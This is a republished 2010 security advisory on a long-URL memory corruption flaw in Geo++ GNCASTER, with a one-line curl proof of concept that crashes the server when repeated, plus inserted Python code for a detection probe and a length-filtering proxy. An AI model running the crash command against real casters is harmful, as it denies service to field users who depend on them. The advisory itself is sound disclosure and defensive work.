
Geo++(R) GNCASTER 1.4.0.7 Insecure Handling Of Long URLs

27 Jan 2010 00:00:00 | Reported by redteam-pentesting.de | Type: packetstorm | Source: packetstormsecurity.com

Geo++(R) GNCASTER versions up to and including 1.4.0.7 handle long URLs insecurely. The flaw allows a reproducible denial of service and may also permit remote code execution on the server. Update to version 1.4.0.8.

Code
`Advisory: Geo++(R) GNCASTER: Insecure handling of long URLs  
  
During a penetration test, RedTeam Pentesting discovered that the  
GNCASTER software does not handle long URLs correctly. An attacker can  
use this to crash the server software or potentially execute code on the  
server.  
  
  
Details  
=======  
  
Product: Geo++(R) GNCASTER  
Affected Versions: <= 1.4.0.7  
Fixed Versions: 1.4.0.8  
Vulnerability Type: Memory corruption  
Security Risk: high  
Vendor URL: http://www.geopp.de  
Vendor Status: notified  
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2010-001  
Advisory Status: published  
CVE: TBA  
CVE URL: TBA  
  
  
Introduction  
============  
  
"Geo++(R) GNCASTER is the Geo++ implementation of a NTRIP caster. NTRIP  
is a protocol within RTCM to provide GNSS information via Internet."  
  
(from the vendor's homepage)  
  
  
More Details  
============  
  
The GNCaster software allows communication with clients through a subset  
of the HTTP protocol. If an attacker sends an HTTP GET request for a  
nonexistent URL path and the path is less than 988 bytes long, the  
server responds with an HTTP 404 error and the message  
  
File "/AAAAAA[...]AAAA" not found on this server.  
  
If the URL path is 988 bytes or longer, the HTTP 404 status is still  
returned, but the server thread handling the request stops before the  
message above is sent.  
  
If attackers send a sequence of such requests in quick succession, the  
server can be reproducibly crashed. RedTeam Pentesting believes it is  
also possible to exploit this vulnerability to execute code on the  
server.  
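The behaviour described above can be checked without crashing the caster by sending one request just below and one at the reported threshold and comparing how the 404 comes back. The following probe is an added example and not part of the advisory or of the vendor's code: it builds the raw GET over a plain TCP socket, classifies the reply, and reports whether the pair of results matches the advisory's description. The host name, port, timeout and the constructed responses used for testing are assumptions; the 988-byte threshold, the counting convention of the proof of concept (988 "A" characters after the slash) and the error message text are taken from the advisory.

```python
"""Probe for the GNCASTER long-URL handling bug (added example, not advisory code).

Assumptions: the caster speaks a subset of HTTP/1.0 on a plain TCP port, and
on a vulnerable version answers a request with 988 or more "A" characters in
the path with a 404 status but without the 'File "..." not found on this
server.' message (or by dropping the connection).
"""
import socket

THRESHOLD = 988                          # number of "A"s reported in the advisory
NOT_FOUND_MSG = b"not found on this server"   # tail of the normal 404 message


def build_request(n_a: int, host: str = "gncaster.example.com") -> bytes:
    """Raw GET for a nonexistent path of the form /AAAA... with n_a "A"s."""
    path = "/" + "A" * n_a
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def classify_response(raw: bytes) -> str:
    """Classify the caster's reply.

    'normal_404'    : 404 status and the expected error message
    'truncated_404' : 404 status but the message never arrived
    'no_response'   : connection closed without any data
    'other'         : anything else (no 404, malformed status line)
    """
    if not raw:
        return "no_response"
    status_line = raw.split(b"\r\n", 1)[0]
    parts = status_line.split()
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/") or parts[1] != b"404":
        return "other"
    return "normal_404" if NOT_FOUND_MSG in raw else "truncated_404"


def probe(host: str, port: int, n_a: int, timeout: float = 5.0) -> str:
    """Send one request with n_a "A"s in the path and classify the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(n_a, host))
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:            # server closed the connection
                    break
                chunks.append(data)
        except socket.timeout:          # nothing more arrived within the timeout
            pass
    return classify_response(b"".join(chunks))


def looks_vulnerable(below: str, at: str) -> bool:
    """Normal 404 below the threshold but a truncated or missing reply at it
    matches the behaviour the advisory describes."""
    return below == "normal_404" and at in ("truncated_404", "no_response")


if __name__ == "__main__":
    import sys
    host, port = sys.argv[1], int(sys.argv[2])   # e.g. gncaster.example.com 1234 (assumed)
    below = probe(host, port, THRESHOLD - 1)
    at = probe(host, port, THRESHOLD)
    print(f"{THRESHOLD - 1} A's: {below}; {THRESHOLD} A's: {at}")
    print("matches advisory behaviour" if looks_vulnerable(below, at) else "no match")
```

Run it once per host; a single pair of requests is enough to see the difference, whereas the crash in the advisory needs the long request repeated in quick succession.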
  
  
Proof of Concept  
================  
  
The following command can be used to crash the server if it is called  
multiple times:  
  
$ curl -i "http://gncaster.example.com:1234/`perl -e 'printf "A"x988'`"  
  
  
  
Workaround  
==========  
  
Until the update is installed, a vulnerable server can be protected by an  
application-layer firewall or reverse proxy that rejects HTTP GET requests  
with overly long URL paths before they reach GNCASTER.  
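The following filtering proxy is an added example of such an application-layer workaround; it is not part of the advisory and not a vendor-supplied tool. It accepts client connections, reads the HTTP request head, rejects any request whose request target is at or above a configured length, and relays everything else unchanged to the real caster. The listen and upstream addresses, the 512-byte limit, the 8 KiB head buffer and the 414 rejection message are assumptions; the limit only has to stay below the 988 bytes the advisory reports.

```python
"""Minimal request-line length filter in front of an NTRIP caster
(added example, not advisory or vendor code).

Assumed values: MAX_TARGET_LEN (must be below the 988-byte threshold from the
advisory), MAX_HEAD, the 414 rejection response, and the listen/upstream
addresses passed to serve().
"""
import socket
import threading

MAX_TARGET_LEN = 512      # assumed limit on the URL path; keep it < 988
MAX_HEAD = 8192           # give up on a request head that never ends in CRLF CRLF
REJECT = b"HTTP/1.0 414 Request-URI Too Long\r\nConnection: close\r\n\r\n"


def check_request_head(head: bytes, max_target_len: int = MAX_TARGET_LEN) -> tuple[bool, str]:
    """Return (allowed, reason) for a request head (request line plus headers)."""
    line, _, _ = head.partition(b"\r\n")
    parts = line.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return False, "malformed request line"
    _method, target, _version = parts
    if len(target) >= max_target_len:
        return False, f"request target too long ({len(target)} bytes)"
    return True, "ok"


def read_head(conn: socket.socket) -> bytes:
    """Read until the end of the header block, bounded by MAX_HEAD bytes."""
    buf = b""
    while b"\r\n\r\n" not in buf and len(buf) < MAX_HEAD:
        chunk = conn.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until either side closes."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass


def handle(client: socket.socket, upstream_addr: tuple[str, int]) -> None:
    """Filter one client connection and relay it to the caster if allowed."""
    with client:
        head = read_head(client)
        allowed, reason = check_request_head(head)
        if not allowed:
            print(f"rejected {client.getpeername()}: {reason}")
            client.sendall(REJECT)
            return
        with socket.create_connection(upstream_addr) as upstream:
            upstream.sendall(head)   # head may already contain body bytes; pass them on
            back = threading.Thread(target=pump, args=(upstream, client), daemon=True)
            back.start()
            pump(client, upstream)
            back.join()


def serve(listen_addr: tuple[str, int], upstream_addr: tuple[str, int]) -> None:
    """Accept clients on listen_addr and relay filtered traffic to upstream_addr."""
    with socket.create_server(listen_addr) as srv:
        while True:
            client, _ = srv.accept()
            threading.Thread(target=handle, args=(client, upstream_addr), daemon=True).start()


if __name__ == "__main__":
    # Assumed deployment: clients connect to port 2101 here, the caster
    # itself listens on 127.0.0.1:1234 and is no longer reachable directly.
    serve(("0.0.0.0", 2101), ("127.0.0.1", 1234))
```

The check is applied to the request target only, so normal mountpoint requests pass through untouched; the proxy does not parse or alter the NTRIP stream once the head has been forwarded.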
  
  
Fix  
===  
  
Update GNCASTER to version 1.4.0.8.  
  
  
Security Risk  
=============  
  
This vulnerability can be used for very efficient DoS attacks. This is  
especially serious as GNCaster is a real-time application that is  
typically used by multiple mobile clients that rely on a functioning  
server. The vulnerability could potentially also be leveraged for remote  
code execution on the server. The risk is therefore regarded as high.  
  
  
History  
=======  
  
2009-07-06 Vulnerability identified during a penetration test  
2009-07-14 Meeting with customer  
2009-12-01 Vendor releases fixed version  
2010-01-27 Advisory released  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests and short pentests,  
performed by a team of specialised IT security experts. In this way,  
security weaknesses in company networks or products are uncovered and can  
be fixed immediately.  
  
As there are only a few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at  
http://www.redteam-pentesting.de.  
  
--   
RedTeam Pentesting GmbH  
Dennewartstr. 25-27  
52068 Aachen  
Germany  
Tel.: +49 241 963-1300  
Fax : +49 241 963-1304  
http://www.redteam-pentesting.de/  
Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck  
`
